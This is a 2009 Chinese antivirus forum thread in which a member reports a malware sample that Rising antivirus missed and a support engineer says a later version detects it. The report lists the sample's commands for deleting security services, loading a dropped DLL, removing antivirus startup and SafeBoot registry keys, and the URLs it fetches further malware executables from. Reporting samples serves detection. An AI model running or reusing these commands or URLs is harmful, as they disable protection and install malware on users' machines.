1   1  /  1  页   跳转

瑞星不报一个

收藏
smallyou93
头像
卡卡反病毒小组
  • 帖子:1545
  • 注册: 2008-12-14
  • 来自:
发表于: 2009-05-10 12:59 | 只看楼主 短消息 资料
字号: 1楼

瑞星不报一个

样本来自http://bbs.ikaka.com/showtopic-8623515.aspx

调用cmd执行以下命令
sc delete avp
net1 start server
sc delete RavCCenter
sc delete RsScanSrv
sc delete RavTask

释放文件C:\rsv.dll并加载
"C:\WINDOWS\system32\rundll32.exe" C:\rsv.dll,RSDK

该文件加载后
篡改文件system32\drivers\asyncmac.sys
再加载,实现恢复SSDT

释放文件:
X:\AUTORUN.INF
X:\GRIL.PIF
%WinDir%\Fonts\smyns.sys并安装驱动

删除以下注册表:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\360Safetray
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\360Safebox
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\KavStart
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\ccApp
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\vptray
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\RavTray
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\egui
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\essact
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

联网下载病毒
http://c.wuc9.com/tt.txt

http://c.wuc9.com/dd/33.exe
http://c.wuc9.com/dd/4.exe
http://c.wuc9.com/dd/6.exe
http://c.wuc9.com/dd/99.exe
http://c.wuc9.com/dd/10.exe

用户系统信息:Opera/9.64 (Windows NT 5.1; U; zh-cn) Presto/2.1.1

附件附件:

您所在的用户组无法下载或查看附件

最后编辑smallyou93 最后编辑于 2009-05-10 13:00:31
分享到:
gototop
 
RisingCSC
头像
在线技术支持工程师
  • 帖子:4368
  • 注册: 2008-02-26
  • 来自:
发表于: 2009-05-11 10:29 | 短消息 资料
字号: 2楼

回复:瑞星不报一个

杀毒软件版本21.37.62时,已可以查杀。
最后编辑RisingCSC 最后编辑于 2009-05-11 10:55:44
站内导航:
新人报道  |  反病毒/反流氓软件  |  RAV/RIS求助  |  RFW求助  |  卡卡助手求助
热点推荐:
RIS2009有奖征文  |  春节活动汇总
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT